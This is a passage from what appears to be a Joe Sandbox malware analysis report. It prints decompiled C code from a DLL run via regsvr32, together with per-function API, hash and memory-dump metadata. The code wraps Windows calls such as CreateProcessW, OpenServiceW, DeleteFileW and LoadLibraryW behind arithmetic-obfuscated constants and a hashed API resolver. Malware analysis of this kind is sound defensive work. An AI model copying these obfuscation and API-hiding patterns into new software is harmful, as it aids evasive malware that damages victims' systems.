				_v12 = _v12 >> 0xa;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 + 0x11b5;
				_v12 = _v12 ^ 0x0007f5c7;
				_v20 = 0x6dcef4;
				_t62 = 0x6b;
				_v20 = _v20 * 0x54;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0xe81a0a50;
				_v16 = 0x9ccfab;
				_v16 = _v16 | 0xc76ed5d6;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x000c5bda;
				_v8 = 0xcca784;
				_v8 = _v8 / _t62;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x01549e3f;
				_v8 = _v8 ^ 0x01571d5c;
				_t58 = E1001BFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
				_t59 =  *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
				return _t59;
			}

APIs

SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 1000F2B0

Memory Dump Source

Source File: 00000004.00000002.427216974.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.427209910.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.427345819.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction ID: 43db0fbf410f694bd0ef4dec65830130c7b281efdb88c6d3b62f5dfa9fb1508e
Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction Fuzzy Hash: B12155B5D0121DAFDB08DFA5C88A8EEFBB4FB48708F10809DE515AA240C7B45B54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 100032B5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E100032B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t62;
				signed int _t64;
				signed int _t65;

				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				E10009E7D(_t49);
				_v32 = 0xf329ca;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0x2373b;
				_t64 = 0x7a;
				_v16 = _v16 * 0x75;
				_t65 = 0x3d;
				_v16 = _v16 / _t64;
				_v16 = _v16 ^ 0x00061266;
				_v12 = 0xb7be71;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 + 0xafdb;
				_v12 = _v12 ^ 0x7920a4e8;
				_v12 = _v12 ^ 0x79205c77;
				_v8 = 0x1abc5;
				_v8 = _v8 / _t65;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x07f89b39;
				_v8 = _v8 ^ 0x07caeaee;
				_v20 = 0x49b926;
				_v20 = _v20 * 0x47;
				_v20 = _v20 ^ 0x147483b3;
				E1001BFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
				_t62 = OpenSCManagerW(0, 0, _a4); // executed
				return _t62;
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 10003384

Strings

w\ y, xrefs: 1000331D

Memory Dump Source

Source File: 00000004.00000002.427216974.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.427209910.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.427345819.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: w\ y
API String ID: 1889721586-240614871
Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction ID: 2673d0b832e4d885b295aa3d0736083a12d9b67bb68571235ce8c26550880700
Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction Fuzzy Hash: 5C2123B5D01228FBDB04DFA9D84A9EEBFB5FF40344F208189E424AA250D3B56B40DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1000C4EB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E1000C4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t46;
				void* _t54;
				int _t58;

				_push(_a16);
				_t58 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t46);
				_v24 = _v24 & 0x00000000;
				_v36 = 0xd40f1;
				_v32 = 0xcb52a0;
				_v28 = 0x146fa1;
				_v20 = 0xb8dab7;
				_v20 = _v20 >> 1;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x0b80f677;
				_v8 = 0x87dd92;
				_v8 = _v8 + 0xffffe9d3;
				_v8 = _v8 * 0x55;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x54d92ec5;
				_v16 = 0xb88fea;
				_v16 = _v16 | 0xf85cd4fd;
				_v16 = _v16 + 0xed22;
				_v16 = _v16 ^ 0xf8f0d6dc;
				_v12 = 0x2c3d87;
				_v12 = _v12 + 0x3690;
				_v12 = _v12 + 0xfffff048;
				_v12 = _v12 ^ 0x0029d00c;
				E1001BFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
				return _t54;
			}

APIs

OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 1000C5BC

Strings

", xrefs: 1000C577

Memory Dump Source

Source File: 00000004.00000002.427216974.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.427209910.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.427345819.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: "
API String ID: 3098006287-1598837362
Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction ID: 888a1af328b60e3115df81a15206c86fde9c8a5b62bfb3d5199cc9c56e09e132
Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction Fuzzy Hash: BF2120B6C0020DEBCF15DFA4D8499EEBBB4FF04318F108598E9256A260E3B19B14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001A98E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E1001A98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t45;
				int _t58;
				signed int _t60;
				signed int _t61;

				_push(_a8);
				_push(_a4);
				E10009E7D(_t45);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xdfb18c;
				_v12 = 0xac05d3;
				_v12 = _v12 + 0xffffe692;
				_t60 = 6;
				_v12 = _v12 * 0xa;
				_v12 = _v12 ^ 0x06b0bc77;
				_v20 = 0xcbcea5;
				_t61 = 0x73;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x0026c0c8;
				_v16 = 0x706a69;
				_v16 = _v16 + 0xffff322e;
				_v16 = _v16 ^ 0x006745ff;
				_v8 = 0xc7f3e7;
				_v8 = _v8 * 0x7b;
				_v8 = _v8 + 0xffffee1e;
				_v8 = _v8 / _t61;
				_v8 = _v8 ^ 0x00d4d133;
				E1001BFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
				_t58 = CloseServiceHandle(_a4); // executed
				return _t58;
			}

APIs

CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 1001AA4C

Strings

ijp, xrefs: 1001A9EB

Memory Dump Source

Source File: 00000004.00000002.427216974.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.427209910.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.427345819.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: ijp
API String ID: 1725840886-2001787820
Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction ID: 08d8414517ae60290be451ade77ec7b27b58724690d5fe81316851794a35ed95
Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction Fuzzy Hash: D62117B5D0520DFBEF04DFA4D98A9AEBBB1EB40304F10C199E404AB250D7B49B449F84

Uniqueness

Uniqueness Score: -1.00%

Function 1000338B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E1000338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t46;
				int _t58;
				signed int _t60;

				_push(_a4);
				E10009E7D(_t46);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x221b15;
				_v20 = 0x156690;
				_t60 = 5;
				_v20 = _v20 * 0x69;
				_v20 = _v20 ^ 0x08c90ac4;
				_v12 = 0x1a8107;
				_v12 = _v12 / _t60;
				_v12 = _v12 | 0x5e0d12b3;
				_v12 = _v12 * 0x36;
				_v12 = _v12 ^ 0xd6d73012;
				_v8 = 0x305b7c;
				_v8 = _v8 + 0xffffaa6a;
				_v8 = _v8 << 0xf;
				_v8 = _v8 | 0xeac0b19d;
				_v8 = _v8 ^ 0xeaf3a664;
				_v16 = 0x5b8d10;
				_v16 = _v16 * 0x69;
				_v16 = _v16 + 0x95d4;
				_v16 = _v16 ^ 0x258da45e;
				E1001BFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
				_t58 = SHFileOperationW(_a4); // executed
				return _t58;
			}

APIs

SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 1000344F

Strings

|[0, xrefs: 100033FC

Memory Dump Source

Source File: 00000004.00000002.427216974.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.427209910.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.427345819.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: |[0
API String ID: 3080627654-3711761429
Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction ID: 33a28676a97f025cdeb7d50283b02d7e423aae746988ab354802b81ac360808e
Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction Fuzzy Hash: 0D2124B4D00209EFDF04DFA5C94AAAEBBB4FB00304F108189E424AA290D7B96B548F90

Uniqueness

Uniqueness Score: -1.00%

Function 1001E373 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1001E373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				int _t51;
				signed int _t53;
				void* _t58;

				_push(_a8);
				_t58 = __edx;
				_push(_a4);
				_push(__edx);
				E10009E7D(_t41);
				_v20 = 0xc362e1;
				_v20 = _v20 + 0xffff2419;
				_v20 = _v20 + 0xffff15b9;
				_v20 = _v20 ^ 0x00c90db5;
				_v16 = 0x370fa8;
				_v16 = _v16 + 0x3ddc;
				_v16 = _v16 + 0xfffffca4;
				_v16 = _v16 ^ 0x003af0ce;
				_v8 = 0x58cda3;
				_t53 = 0x37;
				_v8 = _v8 / _t53;
				_v8 = _v8 | 0xee3498e5;
				_v8 = _v8 + 0xffff3fab;
				_v8 = _v8 ^ 0xee3595ac;
				_v12 = 0xe7384d;
				_v12 = _v12 + 0x2a59;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x2c4bf561;
				E1001BFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
				_t51 = CloseHandle(_t58); // executed
				return _t51;
			}

APIs

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,10013F2A,00000000), ref: 1001E42F

Strings

M8, xrefs: 1001E3ED

Memory Dump Source

Source File: 00000004.00000002.427216974.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.427209910.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.427345819.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: M8
API String ID: 2962429428-669864304
Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
Instruction ID: eb367e5f18db3a68d22521a23e7b1cd58748ba1d5980e3efdeacfb35b3ff9a68
Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
Instruction Fuzzy Hash: 991129B5D00209EFDF58CFE4C94989EBBB4EB40324F108299E824B6291D7B55B059F91

Uniqueness

Uniqueness Score: -1.00%

Function 100146E0 Relevance: 1.6, APIs: 1, Instructions: 76
processCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E100146E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				int _t64;
				signed int _t66;
				struct _PROCESS_INFORMATION* _t72;

				_push(_a68);
				_t72 = __edx;
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E10009E7D(_t55);
				_v8 = 0x728488;
				_v8 = _v8 + 0x86b5;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xe7c2;
				_v8 = _v8 ^ 0x98526b3c;
				_v16 = 0xdd86ac;
				_v16 = _v16 | 0x9093749e;
				_v16 = _v16 + 0x773d;
				_v16 = _v16 ^ 0x90e3102d;
				_v20 = 0xa04379;
				_v20 = _v20 + 0xe8c2;
				_v20 = _v20 ^ 0x00a70f96;
				_v12 = 0x20815c;
				_t66 = 0x4c;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xbbf973da;
				_v12 = _v12 ^ 0xbbf5b48f;
				E1001BFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
				return _t64;
			}

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 100147CA

Memory Dump Source

Source File: 00000004.00000002.427216974.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.427209910.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.427345819.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction ID: bcf8ef1c5a943e26b57c193b06fd13cf537ea9bceb521d738b9e4d3f43ab073a
Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction Fuzzy Hash: EF31E272900248BBDF559F95CD09CDEBF76FB89314F008188FA2466160D7B69A60EB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001BF1C Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E1001BF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				void* _t55;
				long _t60;

				_push(_a40);
				_t60 = __edx;
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t47);
				_v20 = 0x8eb723;
				_v20 = _v20 + 0xdb15;
				_v20 = _v20 ^ 0x00852a30;
				_v16 = 0x113147;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x0008263d;
				_v12 = 0x276480;
				_v12 = _v12 + 0x6f6f;
				_v12 = _v12 | 0x7ba60f09;
				_v12 = _v12 * 0x1e;
				_v12 = _v12 ^ 0x7da9aca6;
				_v8 = 0x62f42b;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000dc6a5;
				E1001BFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
				return _t55;
			}

APIs

CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 1001BFE8

Memory Dump Source

Source File: 00000004.00000002.427216974.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.427209910.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.427345819.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction ID: a5ad079ddfa0ac31df0ef3774d91f9d1bc30e2e7502c2c862d30a0e22a434d2f
Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction Fuzzy Hash: DD21F47680020DBBCF15DF96C9098DFBFB5FB84748F008198F925A2220D3B28A64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 10011B22 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E10011B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t44;
				void* _t55;
				signed int _t57;
				void* _t62;
				long _t63;

				_push(_a16);
				_t62 = __edx;
				_t63 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t44);
				_v12 = 0x22ab7;
				_t57 = 0x25;
				_v12 = _v12 * 0x37;
				_v12 = _v12 / _t57;
				_v12 = _v12 + 0xd1d9;
				_v12 = _v12 ^ 0x00090b04;
				_v16 = 0xc8cc57;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xffff2520;
				_v16 = _v16 ^ 0xfffe92e9;
				_v20 = 0xc52a4b;
				_v20 = _v20 | 0xae757bf4;
				_v20 = _v20 ^ 0xaef18991;
				_v8 = 0xf15120;
				_v8 = _v8 ^ 0xeebb54a4;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x37;
				_v8 = _v8 ^ 0xf39e7cda;
				E1001BFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
				return _t55;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 10011BE5

Memory Dump Source

Source File: 00000004.00000002.427216974.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.427209910.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.427345819.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction ID: d0d425b45aa9a9f6d610c3e920a00689aa0f8126b2cb960a283d8320a45d68de
Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction Fuzzy Hash: A82132B5D00208FBDF05CFA5C94A8EEBBB5FB80314F108089E814A6261D3B4AB41DF61

Uniqueness

Uniqueness Score: -1.00%

Function 100166C2 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E100166C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				intOrPtr* _t45;
				void* _t46;
				void* _t51;

				_t51 = __edx;
				E10009E7D(_t39);
				_v12 = 0xe2acc8;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xbe17;
				_v12 = _v12 ^ 0x0011993b;
				_v20 = 0xf2f568;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xbd5142c5;
				_v8 = 0x6d1128;
				_v8 = _v8 + 0xffff2279;
				_v8 = _v8 << 3;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x19de445b;
				_v16 = 0xb26540;
				_v16 = _v16 + 0xffff3889;
				_v16 = _v16 ^ 0x00b459c6;
				_t45 = E1001BFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
				return _t46;
			}

APIs

SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 10016777

Memory Dump Source

Source File: 00000004.00000002.427216974.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.427209910.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.427345819.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction ID: 52e6f9726e4b7dbd304e61318c5a5b76c55d74289c49a6a1ffc23bebd90897b8
Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
Instruction Fuzzy Hash: 861142B2800208FBCF15CFA5CC0A8DEBFB8EF85304F108198E92966210D3B19A65DB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000FCB5 Relevance: 1.6, APIs: 1, Instructions: 50
libraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1000FCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t36;
				struct HINSTANCE__* _t47;
				signed int _t49;
				signed int _t50;
				WCHAR* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E10009E7D(_t36);
				_v20 = 0x4781cd;
				_t49 = 7;
				_v20 = _v20 / _t49;
				_v20 = _v20 ^ 0x0004a997;
				_v8 = 0x9f6121;
				_v8 = _v8 | 0x04abbfea;
				_v8 = _v8 ^ 0x44133d53;
				_v8 = _v8 ^ 0x40a32c45;
				_v16 = 0x791f5b;
				_t50 = 0x6e;
				_v16 = _v16 / _t50;
				_v16 = _v16 ^ 0x000d135a;
				_v12 = 0x90c5d0;
				_v12 = _v12 ^ 0x2cafc93f;
				_v12 = _v12 ^ 0x2c381e09;
				E1001BFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
				_t47 = LoadLibraryW(_t57); // executed
				return _t47;
			}

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 1000FD58

Memory Dump Source

Source File: 00000004.00000002.427216974.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.427209910.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.427345819.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction ID: 031dc55c3b1f58344b2c48e420bdd783e0c70cefa818c64ca28912174f1a3e10
Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction Fuzzy Hash: A5112E75D00218EBDB18CFE5CC4A8EEBBB5EB44304F10819DE429A6251DBB56B148B91

Uniqueness

Uniqueness Score: -1.00%

Function 10009EA8 Relevance: 1.5, APIs: 1, Instructions: 44
fileCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10009EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t35;
				int _t42;
				WCHAR* _t46;

				_push(_a8);
				_t46 = __ecx;
				_push(_a4);
				_push(__ecx);
				E10009E7D(_t35);
				_v20 = 0xb0cce;
				_v20 = _v20 + 0xffff00ee;
				_v20 = _v20 ^ 0x0007bd05;
				_v12 = 0x1e8fca;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0xffff1da9;
				_v12 = _v12 ^ 0x0077171f;
				_v16 = 0xc679b7;
				_v16 = _v16 + 0x38bf;
				_v16 = _v16 ^ 0x00cf762a;
				_v8 = 0xa3ba51;
				_v8 = _v8 ^ 0xa0d3ead1;
				_v8 = _v8 + 0xe688;
				_v8 = _v8 + 0xffff6d73;
				_v8 = _v8 ^ 0xa079263d;
				E1001BFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
				_t42 = DeleteFileW(_t46); // executed
				return _t42;
			}

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 10009F51

Memory Dump Source

Source File: 00000004.00000002.427216974.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.427209910.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.427345819.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction ID: 418f1ef9d6d25acf68a43748a91802fcf8eb4dd854a304eccc5db4d114e40d6a
Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction Fuzzy Hash: AB1148B2C01619EBDF48DFA4D80A8DEBBB4EF10318F108288E825A6250E7B05B548F91

Uniqueness

Uniqueness Score: -1.00%

Function 1000BA9C Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

